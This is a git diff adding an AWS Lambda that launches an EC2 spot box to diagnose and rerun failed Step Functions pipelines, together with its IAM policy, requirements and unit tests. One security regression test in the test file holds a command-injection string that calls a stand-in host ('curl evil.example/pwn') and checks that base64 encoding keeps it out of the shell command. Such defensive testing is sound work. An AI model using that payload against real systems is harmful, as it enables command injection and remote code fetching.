+      "Condition": {
+        "StringEquals": {
+          "iam:PassedToService": "ec2.amazonaws.com"
+        }
+      }
+    },
+    {
+      "Sid": "SsmRunSfWatchBootstrap",
+      "Effect": "Allow",
+      "Action": [
+        "ssm:SendCommand",
+        "ssm:DescribeInstanceInformation"
+      ],
+      "Resource": "*"
+    },
+    {
+      "Sid": "TerminateSfWatchSpotOnError",
+      "Effect": "Allow",
+      "Action": [
+        "ec2:TerminateInstances"
+      ],
+      "Resource": "*",
+      "Condition": {
+        "StringEquals": {
+          "ec2:ResourceTag/Name": "alpha-engine-sf-watch-spot"
+        }
+      }
+    }
+  ]
+}

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/index.py
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/index.py
@@ -1,0 +1,400 @@
+"""alpha-engine-sf-watch-spot-dispatcher — launch the Fleet-SF Watch
+diagnose+fix+rerun agent on a dedicated EC2 spot box, once per real
+saturday-sf-failure event.
+
+Finishes config#2001 (the SF-failure half; the ci-main-failure half shipped
+as ci-watch-dispatcher/index.py under the same issue). Mirrors that Lambda's
+proven shape via the shared `nousergon_lib.spot_dispatch` primitives
+(config#2106) — no bespoke third copy of the concurrency-lock/launch-with-
+fallback/terminate-on-failure logic.
+
+Mechanism:
+  1. `spot_dispatch.launch_with_fallback()` rotates instance_type x subnet on
+     capacity error; on SpotCapacityExhausted across all pools we relaunch
+     ON-DEMAND (spot=False) so a capacity dip never silently drops an SF
+     repair.
+  2. Wait for the instance to run + its SSM agent to come Online.
+  3. Fire an async, detached `ssm send-command` (AWS-RunShellScript) carrying
+     a small prelude: fetch the PAT from SSM, clone alpha-engine-config, then
+     `exec infrastructure/sf_watch_spot_bootstrap.sh` (a sibling script in
+     alpha-engine-config). The box self-terminates
+     (InstanceInitiatedShutdownBehavior=terminate + its own on-box watchdog).
+
+SYNCHRONOUS CONTRACT (identical to ci-watch-dispatcher's): a GHA job invokes
+this Lambda with RequestResponse (not async) and branches directly on the
+returned JSON. Every anticipated failure mode — concurrency skip,
+spot+on-demand launch exhaustion, a malformed event, a post-launch SSM
+failure — returns a clean, well-formed `{"launched": false, "reason": ...}`
+rather than raising. Only a genuinely unexpected internal bug should still
+propagate as a Python exception.
+
+CONCURRENCY LOCK: keyed on `Name=alpha-engine-sf-watch-spot` +
+`sf-watch-cadence=<cadence_slug>` + `sf-watch-pipeline=<pipeline_name>` +
+`sf-watch-run-date=<run_date>` — the FULL identifying key (mirrors ci-watch's
+own use of its full (repo, sha) key, not a partial one): two different
+run_dates failing independently for the same pipeline+cadence must each get
+their own box. Fail-safe OPEN on any API error.
+
+CAUSE FIELD IS BASE64: `cause` (the SF failure detail) is arbitrary AWS-
+supplied text, unlike every other event field here — it is NOT regex-
+validated and is base64-encoded before being embedded in the constructed SSM
+shell command (command-injection guard; see `_bootstrap_command` and
+alpha-engine-config's `sf_watch_spot_bootstrap.sh --cause-b64`).
+
+IAM PROFILE — deliberately NOT `alpha-engine-executor-profile` (shared with
+the live trading executor) NOR the OIDC-only `saturday-sf-watch-role` (which
+cannot back an EC2 instance profile at all). Uses
+`alpha-engine-sf-watch-executor-profile`, a dedicated instance profile
+created in `alpha-engine-config`'s IAM json files.
+
+Managed OUTSIDE CloudFormation (same as ci-watch-dispatcher/scheduled-groom-
+dispatcher): operator-deployed via `deploy.sh --bootstrap`. Merging the PR
+has ZERO live effect until the new code + IAM are deployed AND
+`sf-watch.yml`'s `sf-watch-dispatch` job is wired to invoke this Lambda.
+"""
+
+from __future__ import annotations
+
+import base64
+import logging
+import os
+import re
+import time
+import uuid
+
+import boto3
+from nousergon_lib import spot_dispatch
+from nousergon_lib.spot_dispatch import SpotCapacityExhausted, SpotLaunchError
+
+logger = logging.getLogger()
+logger.setLevel(os.environ.get("LOG_LEVEL", "INFO"))
+
+REGION = os.environ.get("AWS_REGION", "us-east-1")
+
+# Kill-switch: SF_WATCH_DISPATCH_ENABLED=false disables the launch without
+# touching the GHA invoke wiring — mirrors every other fleet dispatcher's
+# safety valve. Default ON.
+DISPATCH_ENABLED = os.environ.get("SF_WATCH_DISPATCH_ENABLED", "true").lower() == "true"
+
+# ── Spot launch config (env-overridable; defaults mirror ci-watch-dispatcher/
+# scheduled-groom-dispatcher — same default-VPC/AMI/security-group, only the
+# IAM profile differs for blast-radius isolation). ────────────────────────────
+INSTANCE_TYPES = [
+    t.strip()
+    for t in os.environ.get(
+        "SF_WATCH_INSTANCE_TYPES", "t3.medium,t3a.medium,t2.medium"
+    ).split(",")
+    if t.strip()
+]
+SUBNETS = [
+    s.strip()
+    for s in os.environ.get(
+        "SF_WATCH_SUBNETS",
+        "subnet-a61ec0fb,subnet-1e58307a,subnet-789d3857,"
+        "subnet-c670118d,subnet-7cff7c43,subnet-e07166ec",
+    ).split(",")
+    if s.strip()
+]
+AMI_ID = os.environ.get("SF_WATCH_AMI_ID", "ami-0c421724a94bba6d6")  # Amazon Linux 2023 x86_64
+KEY_NAME = os.environ.get("SF_WATCH_KEY_NAME", "alpha-engine-key")
+SECURITY_GROUP = os.environ.get("SF_WATCH_SECURITY_GROUP", "sg-03cd3c4bd91e610b0")
+# NEW, dedicated profile — deliberately NOT alpha-engine-executor-profile (the
+# live trading executor's profile) NOR saturday-sf-watch-role (OIDC-only,
+# cannot back an EC2 instance profile). See module docstring.
+IAM_PROFILE = os.environ.get("SF_WATCH_IAM_PROFILE", "alpha-engine-sf-watch-executor-profile")
+VOLUME_SIZE_GB = int(os.environ.get("SF_WATCH_VOLUME_SIZE_GB", "40"))
+
+SF_WATCH_TAG_NAME = "alpha-engine-sf-watch-spot"
+SF_WATCH_CADENCE_TAG_KEY = "sf-watch-cadence"
+SF_WATCH_PIPELINE_TAG_KEY = "sf-watch-pipeline"
+SF_WATCH_RUN_DATE_TAG_KEY = "sf-watch-run-date"
+
+# The box reads its own run secrets (PAT) via its instance profile in the
+# common case, but the PRELUDE below (run before the profile-backed bootstrap
+# script takes over) still needs the PAT to clone the private config repo —
+# same shape as the other spot dispatchers' preludes. Reuses the SAME shared
+# SSM param the other spot dispatchers already read.
+SF_WATCH_GH_PAT_SSM = os.environ.get(
+    "SF_WATCH_GH_PAT_SSM", "/alpha-engine/saturday_sf_watch/github_pat"
+)
+SF_WATCH_CONFIG_REPO = os.environ.get("SF_WATCH_CONFIG_REPO", "nousergon/alpha-engine-config")
+SF_WATCH_CONFIG_BRANCH = os.environ.get("SF_WATCH_CONFIG_BRANCH", "main")
+# Hard ceiling for the on-box SSM command (matches the bootstrap watchdog).
+# Mirrors the retired inline GHA job's 300-min timeout + headroom, same as
+# ci-watch-dispatcher's.
+MAX_RUNTIME_SECONDS = int(os.environ.get("SF_WATCH_MAX_RUNTIME_SECONDS", "19200"))
+SSM_ONLINE_BUDGET_SEC = int(os.environ.get("SF_WATCH_SSM_ONLINE_BUDGET_SEC", "180"))
+CW_LOG_GROUP = os.environ.get("SF_WATCH_CW_LOG_GROUP", "/alpha-engine/sf-watch-spot")
+
+# Defense-in-depth allowlists for event fields embedded verbatim into the SSM
+# shell command below (mirrors ci-watch-dispatcher's _REPO_RE/_SHA_RE/etc).
+# These come from a GHA job (not raw external user input), but the same cheap
+# regex check rules out shell-metacharacter injection outright. `cause` is
+# deliberately NOT here — see module docstring's "CAUSE FIELD IS BASE64".
+_PIPELINE_RE = re.compile(r"^[A-Za-z0-9_-]{1,128}$")
+_CADENCE_RE = re.compile(r"^[a-z0-9_-]{1,32}$")
+_ARN_RE = re.compile(r"^arn:aws:states:[a-z0-9-]+:\d{12}:(stateMachine|execution):[A-Za-z0-9_.:/-]+$")
+_RUN_DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
+_FAILED_STATE_RE = re.compile(r"^[A-Za-z0-9 _.:()/-]{0,200}$")
+_WATCH_LOG_KEY_RE = re.compile(r"^[A-Za-z0-9_./-]{0,300}$")
+_BOOL_RE = re.compile(r"^(true|false)$")
+
+
+class _InvalidEvent(ValueError):
+    """A required event field is missing or fails its allowlist."""
+
+
+def _require(event: dict, key: str, pattern: "re.Pattern[str]") -> str:
+    val = str(event.get(key) or "").strip()
+    if not pattern.match(val):
+        raise _InvalidEvent(f"missing/malformed {key!r} in event: {val!r}")
+    return val
+
+
+def _optional(event: dict, key: str, pattern: "re.Pattern[str]", default: str = "") -> str:
+    val = str(event.get(key) or "").strip()
+    if not val:
+        return default
+    if not pattern.match(val):
+        raise _InvalidEvent(f"malformed {key!r} in event: {val!r}")
+    return val
+
+
+def _resolve_event_fields(event: dict) -> dict:
+    """Validate the GHA payload's SF fields; raises _InvalidEvent on any
+    missing/malformed field (caught once, at the handler, and converted to a
+    clean launched:false — see module docstring's synchronous contract)."""
+    pipeline_name = _require(event, "pipeline_name", _PIPELINE_RE)
+    cadence_slug = _require(event, "cadence_slug", _CADENCE_RE)
+    run_date = _require(event, "run_date", _RUN_DATE_RE)
+    execution_arn = _require(event, "execution_arn", _ARN_RE)
+    state_machine_arn = _optional(event, "state_machine_arn", _ARN_RE)
+    failed_state = _optional(event, "failed_state", _FAILED_STATE_RE)
+    watch_log_key = _optional(event, "watch_log_key", _WATCH_LOG_KEY_RE)
+    is_preflight = _optional(event, "is_preflight", _BOOL_RE, default="false")
+    # cause: deliberately unvalidated — arbitrary AWS text, base64-encoded
+    # before it ever reaches a shell command (see _bootstrap_command).
+    cause = str(event.get("cause") or "")
+    return {
+        "pipeline_name": pipeline_name,
+        "cadence_slug": cadence_slug,
+        "run_date": run_date,
+        "execution_arn": execution_arn,
+        "state_machine_arn": state_machine_arn,
+        "failed_state": failed_state,
+        "watch_log_key": watch_log_key,
+        "is_preflight": is_preflight,
+        "cause": cause,
+    }
+
+
+def _bootstrap_command(fields: dict, run_token: str) -> str:
+    """The async SSM RunShellScript body: fetch PAT, clone config, exec the
+    sf_watch_spot_bootstrap.sh entrypoint in alpha-engine-config. Any prelude
+    failure shuts the box down so a botched launch never idles (mirrors
+    ci-watch-dispatcher's prelude fail() trap exactly).
+
+    ``sf_watch_spot_bootstrap.sh`` takes its SF fields as CLI FLAGS
+    (``--pipeline``/``--cadence-slug``/...), not environment variables —
+    invoke it that way, not via `export`. ``run_token`` is deliberately NOT
+    threaded into the box: the bootstrap/run-script side keys its S3
+    completion marker directly on (cadence_slug, pipeline_name, run_date) —
+    it stays a Lambda-side-only correlation id (see the SSM Comment field in
+    ``_send_bootstrap``, and the handler's returned JSON)."""
+    cause_b64 = base64.b64encode(fields["cause"].encode("utf-8")).decode("ascii")
+    return f"""set -uo pipefail
+export AWS_DEFAULT_REGION={REGION}
+# SSM RunShellScript runs as root with NO $HOME set; git config/clone need it.
+export HOME=/root
+fail() {{ echo "[sf-watch-prelude] FATAL: $1"; shutdown -h now; exit 1; }}
+dnf install -y -q git python3.12 python3.12-pip >/dev/null 2>&1 \
+  || fail "runtime install (git/python3.12) failed"
+PAT=$(aws ssm get-parameter --name {SF_WATCH_GH_PAT_SSM} --with-decryption \
+  --query Parameter.Value --output text --region {REGION} 2>/dev/null) || fail "PAT read failed"
+[ -n "$PAT" ] || fail "PAT empty"
+git config --global --add safe.directory '*' || true
+rm -rf /home/ec2-user/alpha-engine-config
+git clone --depth 1 --branch {SF_WATCH_CONFIG_BRANCH} \
+  "https://x-access-token:${{PAT}}@github.com/{SF_WATCH_CONFIG_REPO}.git" \
+  /home/ec2-user/alpha-engine-config || fail "clone failed"
+cd /home/ec2-user/alpha-engine-config
+exec bash infrastructure/sf_watch_spot_bootstrap.sh \
+  --pipeline "{fields['pipeline_name']}" --cadence-slug "{fields['cadence_slug']}" \
+  --state-machine-arn "{fields['state_machine_arn']}" --execution-arn "{fields['execution_arn']}" \
+  --run-date "{fields['run_date']}" --failed-state "{fields['failed_state']}" \
+  --cause-b64 "{cause_b64}" --watch-log-key "{fields['watch_log_key']}" \
+  --is-preflight "{fields['is_preflight']}"
+"""
+
+
+def _launch_instance() -> tuple[str, str]:
+    """Launch the SF-watch box; spot first, on-demand fallback on capacity
+    exhaustion. Raises SpotLaunchError (or the SpotCapacityExhausted
+    subclass) if BOTH the spot attempt and the on-demand fallback are
+    exhausted/fail — caught once by the caller and converted to a clean
+    launched:false."""
+    return spot_dispatch.launch_with_fallback(
+        INSTANCE_TYPES, SUBNETS,
+        image_id=AMI_ID,
+        key_name=KEY_NAME,
+        security_group_ids=[SECURITY_GROUP],
+        iam_instance_profile=IAM_PROFILE,
+        volume_size_gb=VOLUME_SIZE_GB,
+        tag_name=SF_WATCH_TAG_NAME,
+        region=REGION,
+    )
+
+
+def _wait_ssm_online(instance_id: str) -> None:
+    """Block until the instance is running AND its SSM agent registers Online."""
+    spot_dispatch.wait_ssm_online(
+        instance_id, region=REGION, ssm_online_budget_sec=SSM_ONLINE_BUDGET_SEC
+    )
+
+
+def _send_bootstrap(fields: dict, instance_id: str, run_token: str) -> str:
+    """Fire the async, detached SSM command that runs SF-watch + self-terminates."""
+    return spot_dispatch.send_async_command(
+        instance_id,
+        _bootstrap_command(fields, run_token),
+        comment=(
+            f"sf-watch ({fields['cadence_slug']}/{fields['pipeline_name']}, "
+            f"run_date {fields['run_date']}, token {run_token[:12]})"
+        ),
+        region=REGION,
+        cw_log_group=CW_LOG_GROUP,
+        execution_timeout_seconds=MAX_RUNTIME_SECONDS,
+    )
+
+
+def _running_sf_watch_instance_ids(cadence_slug: str, pipeline_name: str, run_date: str) -> list[str]:
+    """Instance ids for a LIVE (pending/running) sf-watch box already working
+    THIS exact (cadence_slug, pipeline_name, run_date) — the full identifying
+    key (mirrors ci-watch-dispatcher's own use of its full (repo, sha) key):
+    two different run_dates failing independently for the same
+    pipeline+cadence must each get their own box. Fail-safe: any API error
+    returns [] (never blocks a launch on a broken check)."""
+    return spot_dispatch.running_instance_ids(
+        SF_WATCH_TAG_NAME,
+        {
+            SF_WATCH_CADENCE_TAG_KEY: cadence_slug,
+            SF_WATCH_PIPELINE_TAG_KEY: pipeline_name,
+            SF_WATCH_RUN_DATE_TAG_KEY: run_date,
+        },
+        region=REGION,
+    )
+
+
+def _terminate_instance(instance_id: str) -> None:
+    """Best-effort terminate of a just-launched box whose post-launch steps
+    failed. Without this the box orphans: it received no bootstrap, so
+    neither the on-box watchdog nor the EXIT trap (both armed BY the
+    bootstrap) is running to tear it down. Never masks the original error
+    (logged, not raised) — mirrors ci-watch-dispatcher's `_terminate_instance`
+    exactly."""
+    spot_dispatch.terminate_on_failure(instance_id, region=REGION, label="sf-watch")
+
+
+def _launch_sf_watch_spot(fields: dict) -> dict:
+    """Launch + bootstrap the SF-watch box. SYNCHRONOUS contract: every
+    anticipated failure mode returns a clean, well-formed launched:false
+    rather than raising — see module docstring."""
+    if not DISPATCH_ENABLED:
+        logger.warning("SF_WATCH_DISPATCH_ENABLED=false — sf-watch spot NOT launched")
+        return {"launched": False, "reason": "disabled"}
+
+    cadence_slug, pipeline_name, run_date = (
+        fields["cadence_slug"], fields["pipeline_name"], fields["run_date"],
+    )
+    existing = _running_sf_watch_instance_ids(cadence_slug, pipeline_name, run_date)
+    if existing:
+        logger.warning(
+            "sf-watch box already live for %s/%s@%s (%s) — skipping launch to "
+            "avoid a concurrent duplicate run", cadence_slug, pipeline_name, run_date, existing)
+        return {"launched": False, "reason": "concurrent_skip",
+                "existing_instance_ids": existing}
+
+    run_token = uuid.uuid4().hex
+    try:
+        instance_id, market = _launch_instance()
+    except SpotLaunchError as exc:
+        logger.error("sf-watch spot launch failed: %s: %s", type(exc).__name__, exc)
+        return {"launched": False, "reason": "launch_failed", "error": str(exc)}
+
+    logger.info("launched sf-watch box %s (%s) for %s/%s@%s",
+               instance_id, market, cadence_slug, pipeline_name, run_date)
+    # config#1979-style tags so the NEXT trigger's guard check (above) — and
+    # the fleet spot-orphan-reaper's incomplete-reap alert — can find them.
+    # Best-effort — a tag-write failure must not abort an already-launched
+    # box (mirrors ci-watch-dispatcher's fail-safe posture on its own tags).
+    try:
+        boto3.client("ec2", region_name=REGION).create_tags(
+            Resources=[instance_id],
+            Tags=[
+                {"Key": SF_WATCH_CADENCE_TAG_KEY, "Value": cadence_slug},
+                {"Key": SF_WATCH_PIPELINE_TAG_KEY, "Value": pipeline_name},
+                {"Key": SF_WATCH_RUN_DATE_TAG_KEY, "Value": run_date},
+            ],
+        )
+    except Exception as exc:  # noqa: BLE001 — non-fatal, mirrors ci-watch's tag write
+        logger.warning("sf-watch discriminator tag write failed (non-fatal): %s: %s",
+                       type(exc).__name__, exc)
+
+    # Once the box is up, ANY failure before the bootstrap command is
+    # delivered would orphan it (no watchdog/trap yet). Terminate-on-error —
+    # return a clean result rather than re-raising (this Lambda's synchronous
+    # caller needs a JSON verdict, not an invocation error to unwrap).
+    try:
+        _wait_ssm_online(instance_id)
+        command_id = _send_bootstrap(fields, instance_id, run_token)
+    except Exception as exc:  # noqa: BLE001 — converted to a clean launched:false
+        _terminate_instance(instance_id)
+        logger.error("sf-watch post-launch step failed for %s: %s: %s",
+                     instance_id, type(exc).__name__, exc)
+        return {"launched": False, "reason": "post_launch_failed",
+                "instance_id": instance_id, "error": str(exc)}
+
+    logger.info(
+        "sf-watch dispatched: instance=%s market=%s command=%s cadence=%s pipeline=%s "
+        "run_date=%s run_token=%s", instance_id, market, command_id, cadence_slug,
+        pipeline_name, run_date, run_token,
+    )
+    return {
+        "launched": True,
+        "reason": "launched",
+        "instance_id": instance_id,
+        "market": market,
+        "command_id": command_id,
+        "cadence_slug": cadence_slug,
+        "pipeline_name": pipeline_name,
+        "run_date": run_date,
+        "run_token": run_token,
+    }
+
+
+def handler(event: dict, context) -> dict:  # noqa: ARG001 — Lambda contract
+    """Synchronous handler invoked once per real saturday-sf-failure event —
+    NOT on a schedule. `event` carries {"pipeline_name", "cadence_slug",
+    "state_machine_arn", "execution_arn", "run_date", "failed_state", "cause",
+    "watch_log_key", "is_preflight"} from the GHA job's `lambda invoke`
+    payload (RequestResponse).
+
+    Returns {"launched": bool, "reason": str, "instance_id": ..., ...} — read
+    DIRECTLY by the GHA job as its success signal. Every anticipated failure
+    (malformed event, concurrency skip, spot+on-demand launch exhaustion,
+    post-launch SSM failure) is a clean return, never an exception — see
+    module docstring's synchronous contract.
+    """
+    event = event or {}
+    try:
+        fields = _resolve_event_fields(event)
+    except _InvalidEvent as exc:
+        logger.error("invalid sf-watch event: %s", exc)
+        return {"launched": False, "reason": "invalid_event", "error": str(exc)}
+
+    logger.info(
+        "sf-watch trigger: pipeline=%s cadence=%s run_date=%s execution_arn=%s",
+        fields["pipeline_name"], fields["cadence_slug"], fields["run_date"],
+        fields["execution_arn"],
+    )
+    return _launch_sf_watch_spot(fields)

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/requirements.txt
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/requirements.txt
@@ -1,0 +1,10 @@
+# boto3 is provided by the Lambda python3.12 runtime; pinned for reproducible builds.
+boto3>=1.34.0
+# nousergon_lib.spot_dispatch (config#2106) wraps krepis.ec2_spot (the
+# spot-launch capacity-resilience chokepoint) — SAME pin as
+# scheduled-groom-dispatcher/ci-watch-dispatcher. v0.100.0 is the first
+# version carrying spot_dispatch. No [flow-doctor] extra needed — this
+# Lambda sends no Telegram of its own (the synchronous GHA caller reads the
+# return value directly; see index.py docstring).
+nousergon-lib @ git+https://github.com/nousergon/nousergon-lib@v0.100.0
+krepis>=0.10.2

--- a/infrastructure/lambdas/sf-watch-spot-dispatcher/test_handler.py
+++ b/infrastructure/lambdas/sf-watch-spot-dispatcher/test_handler.py
@@ -1,19 +1,22 @@
-"""Unit tests for the synchronous CI-failure -> ci-watch-spot dispatcher.
+"""Unit tests for the synchronous SF-failure -> sf-watch-spot dispatcher.
 
 Hermetic: ``nousergon_lib.ec2_spot`` and ``boto3`` are stubbed in sys.modules
-BEFORE importing index (mirrors scheduled-groom-dispatcher/test_handler.py).
+BEFORE importing index (mirrors ci-watch-dispatcher/test_handler.py — index.py
+itself imports the REAL nousergon_lib.spot_dispatch, which resolves its own
+`from nousergon_lib import ec2_spot` / `import boto3` against these stubs).
 Validates: a valid event launches a spot box and fires an async SSM command;
 the on-demand fallback on spot capacity exhaustion; a total launch failure
 (spot AND on-demand exhausted) returns a clean launched:false rather than
-raising; the (repo, sha)-scoped concurrency lock (narrower than groom's
-per-tier lock — two different shas on the same repo must NOT block each
-other); a post-launch SSM-send failure terminates the box and returns
-launched:false; a malformed event returns launched:false rather than raising;
-the kill-switch short-circuit.
+raising; the (cadence_slug, pipeline_name, run_date)-scoped concurrency lock;
+a post-launch SSM-send failure terminates the box and returns launched:false;
+a malformed event returns launched:false rather than raising; the kill-switch
+short-circuit; and the cause-field base64 command-injection guard.
 """
 
 from __future__ import annotations
 
+import base64
+import importlib
 import os
 import sys
 import types
@@ -54,8 +57,8 @@ class _FakeEc2:
     def __init__(self, running_instances=None):
         self.terminated = []
         self.tags_created = []
-        # {(repo, sha) -> [instance_ids]} already "live" for the concurrency
-        # guard's describe_instances check to find.
+        # {(cadence_slug, pipeline_name, run_date) -> [instance_ids]} already
+        # "live" for the concurrency guard's describe_instances check to find.
         self._running_instances = dict(running_instances or {})
 
     def get_waiter(self, name):
@@ -71,9 +74,10 @@ class _FakeEc2:
 
     def describe_instances(self, Filters):  # noqa: N803 — boto3 kwarg name
         by_name = {f["Name"]: f["Values"] for f in Filters}
-        repo = by_name.get("tag:ci-watch-repo", [None])[0]
-        sha = by_name.get("tag:ci-watch-sha", [None])[0]
-        ids = self._running_instances.get((repo, sha), [])
+        cadence = by_name.get("tag:sf-watch-cadence", [None])[0]
+        pipeline = by_name.get("tag:sf-watch-pipeline", [None])[0]
+        run_date = by_name.get("tag:sf-watch-run-date", [None])[0]
+        ids = self._running_instances.get((cadence, pipeline, run_date), [])
         return {"Reservations": [{"Instances": [{"InstanceId": i} for i in ids]}]} if ids else {"Reservations": []}
 
 
@@ -100,21 +104,16 @@ def _load(monkeypatch, *, launch_impl=None, env=None, running_instances=None):
     _install_stubs(launch_impl, clients)
     # Derive the stub requirement from index.py's live import graph and fail
     # loud on drift here, rather than as a ModuleNotFoundError at deploy time
-    # (config#1746 pattern — see scheduled-groom-dispatcher/test_handler.py).
+    # (config#1746 pattern — see ci-watch-dispatcher/test_handler.py).
     from _shared.hermetic_import_guard import assert_hermetic_imports_satisfied
 
     assert_hermetic_imports_satisfied(__file__)
-    import importlib
-
     # nousergon_lib.spot_dispatch (config#2106) sits between index.py and the
     # stubbed nousergon_lib.ec2_spot/boto3 above. Its own `from nousergon_lib
     # import ec2_spot` / `import boto3` bindings are resolved once at ITS
-    # import time — if it's already cached in sys.modules from a prior test's
-    # stub, `import index` + reload(index) alone would NOT re-resolve those
-    # bindings (index just re-fetches the same, stale spot_dispatch module
-    # object). Reload spot_dispatch in place first (never a bare del+reimport
-    # — see reference_pytest_del_reimport_vs_reload_fixture_corruption_260709)
-    # so every test sees the CURRENT stub.
+    # import time — reload it in place (never a bare del+reimport — see
+    # reference_pytest_del_reimport_vs_reload_fixture_corruption_260709) so
+    # every test sees the CURRENT stub.
     if "nousergon_lib.spot_dispatch" in sys.modules:
         importlib.reload(sys.modules["nousergon_lib.spot_dispatch"])
     else:
@@ -130,12 +129,15 @@ def _load(monkeypatch, *, launch_impl=None, env=None, running_instances=None):
 
 def _event(**overrides):
     base = {
-        "repo": "nousergon/alpha-engine-config",
-        "sha": "abc1234def5678900000000000000000000abcd",
-        "run_id": "123456789",
-        "run_url": "https://github.com/nousergon/alpha-engine-config/actions/runs/123456789",
-        "workflow": "Fleet CI",
-        "branch": "main",
+        "pipeline_name": "ne-weekly-freshness-pipeline",
+        "cadence_slug": "saturday",
+        "state_machine_arn": "arn:aws:states:us-east-1:711398986525:stateMachine:ne-weekly-freshness-pipeline",
+        "execution_arn": "arn:aws:states:us-east-1:711398986525:execution:ne-weekly-freshness-pipeline:run-1",
+        "run_date": "2026-07-11",
+        "failed_state": "RationaleClustering",
+        "cause": "States.Timeout",
+        "watch_log_key": "consolidated/saturday_sf_watch/2026-07-11.json",
+        "is_preflight": "false",
     }
     base.update(overrides)
     return base
@@ -150,40 +152,68 @@ def test_valid_event_launches_spot_and_sends_async_ssm(monkeypatch):
         calls["tag_name"] = kw.get("tag_name")
         return "i-abc"
 
-    idx = _load(monkeypatch, launch_impl=_launch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
+    idx = _load(monkeypatch, launch_impl=_launch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
     out = idx.handler(_event(), None)
     assert out["launched"] is True
     assert out["reason"] == "launched"
     assert out["instance_id"] == "i-abc"
     assert out["market"] == "spot"
     assert out["command_id"] == "cmd-123"
-    assert out["repo"] == "nousergon/alpha-engine-config"
+    assert out["pipeline_name"] == "ne-weekly-freshness-pipeline"
+    assert out["cadence_slug"] == "saturday"
+    assert out["run_date"] == "2026-07-11"
     assert calls["spot"] is True
-    assert calls["profile"] == "alpha-engine-ci-watch-executor-profile"
-    assert calls["tag_name"] == "alpha-engine-ci-watch-spot"
-    # The instance is tagged with its repo+sha for the concurrency guard.
+    assert calls["profile"] == "alpha-engine-sf-watch-executor-profile"
+    assert calls["tag_name"] == "alpha-engine-sf-watch-spot"
+    # The instance is tagged with its cadence/pipeline/run_date for the
+    # concurrency guard AND the fleet spot-orphan-reaper's completion check.
     assert idx._test_ec2.tags_created == [
-        (["i-abc"], [{"Key": "ci-watch-repo", "Value": "nousergon/alpha-engine-config"},
-                     {"Key": "ci-watch-sha", "Value": "abc1234def5678900000000000000000000abcd"}])
+        (["i-abc"], [
+            {"Key": "sf-watch-cadence", "Value": "saturday"},
+            {"Key": "sf-watch-pipeline", "Value": "ne-weekly-freshness-pipeline"},
+            {"Key": "sf-watch-run-date", "Value": "2026-07-11"},
+        ])
     ]
     sent = idx._test_ssm.sent[0]
     cmd = sent["Parameters"]["commands"][0]
-    # ci_watch_spot_bootstrap.sh (alpha-engine-config) takes its CI fields as
-    # CLI FLAGS, not env vars — assert the actual invocation shape, not an
-    # `export CI_WATCH_*` form the bootstrap script never reads.
-    assert "exec bash infrastructure/ci_watch_spot_bootstrap.sh" in cmd
-    assert '--ci-repo "nousergon/alpha-engine-config"' in cmd
-    assert '--ci-sha "abc1234def5678900000000000000000000abcd"' in cmd
-    assert '--ci-run-url "https://github.com' in cmd
+    # sf_watch_spot_bootstrap.sh (alpha-engine-config) takes its SF fields as
+    # CLI FLAGS, not env vars.
+    assert "exec bash infrastructure/sf_watch_spot_bootstrap.sh" in cmd
+    assert '--pipeline "ne-weekly-freshness-pipeline"' in cmd
+    assert '--cadence-slug "saturday"' in cmd
+    assert '--execution-arn "arn:aws:states:us-east-1:711398986525:execution:ne-weekly-freshness-pipeline:run-1"' in cmd
+    assert '--run-date "2026-07-11"' in cmd
+    assert '--failed-state "RationaleClustering"' in cmd
+    assert '--watch-log-key "consolidated/saturday_sf_watch/2026-07-11.json"' in cmd
+    assert '--is-preflight "false"' in cmd
     assert "export HOME=/root" in cmd
+    # cause is base64-encoded, never raw, in the constructed shell command.
+    expected_b64 = base64.b64encode(b"States.Timeout").decode("ascii")
+    assert f'--cause-b64 "{expected_b64}"' in cmd
+    assert "States.Timeout" not in cmd
     # run_token is NOT threaded into the box (no in-box consumer — the
-    # completion marker keys directly on repo+sha) — only a Lambda-side
-    # correlation id, surfaced via the SSM Comment field instead.
+    # completion marker keys directly on cadence/pipeline/run_date) — only a
+    # Lambda-side correlation id, surfaced via the SSM Comment field instead.
     assert "run_token" not in cmd
-    assert "CI_WATCH_RUN_TOKEN" not in cmd
     assert "token" in sent["Comment"]
 
     assert sent["Parameters"]["executionTimeout"] == [str(idx.MAX_RUNTIME_SECONDS)]
+
+
+def test_cause_with_shell_metacharacters_is_safely_base64_encoded(monkeypatch):
+    """Security regression guard: a `cause` string containing quotes/`$`/
+    backticks must NEVER be interpolated raw into the constructed SSM shell
+    command — only its base64 encoding may appear."""
+    dangerous_cause = '$(curl evil.example/pwn); `whoami`; "quoted"; \' single \''
+    idx = _load(monkeypatch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
+    out = idx.handler(_event(cause=dangerous_cause), None)
+    assert out["launched"] is True
+    cmd = idx._test_ssm.sent[0]["Parameters"]["commands"][0]
+    assert dangerous_cause not in cmd
+    assert "curl evil.example" not in cmd
+    assert "whoami" not in cmd
+    expected_b64 = base64.b64encode(dangerous_cause.encode("utf-8")).decode("ascii")
+    assert f'--cause-b64 "{expected_b64}"' in cmd
 
 
 def test_on_demand_fallback_on_spot_capacity_exhaustion(monkeypatch):
@@ -195,7 +225,7 @@ def test_on_demand_fallback_on_spot_capacity_exhaustion(monkeypatch):
             raise _SpotCapacityExhausted("no capacity in any pool")
         return "i-ondemand"
 
-    idx = _load(monkeypatch, launch_impl=_launch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
+    idx = _load(monkeypatch, launch_impl=_launch, env={"SF_WATCH_DISPATCH_ENABLED": "true"})
     out = idx.handler(_event(), None)
     assert out["launched"] is True
     assert out["market"] == "on-demand"
@@ -204,13 +234,13 @@ def test_on_demand_fallback_on_spot_capacity_exhaustion(monkeypatch):
 
 
 def test_total_launch_exhaustion_returns_clean_false_not_raise(monkeypatch):
-    # SYNCHRONOUS contract (index.py docstring): unlike groom's fail-loud
-    # posture, spot AND on-demand both exhausted must be a clean return, not
-    # an exception — the GHA caller needs a JSON verdict to branch on.
+    # SYNCHRONOUS contract (index.py docstring): spot AND on-demand both
+    # exhausted must be a clean return, not an exception — the GHA caller
+    # needs a JSON verdict to branch on.
     def _launch(types_, subnets, **kw):
         raise _SpotCapacityExhausted("exhausted everywhere")
 
-    idx = _load(monkeypatch, launch_impl=_launch, env={"CI_WATCH_DISPATCH_ENABLED": "true"})
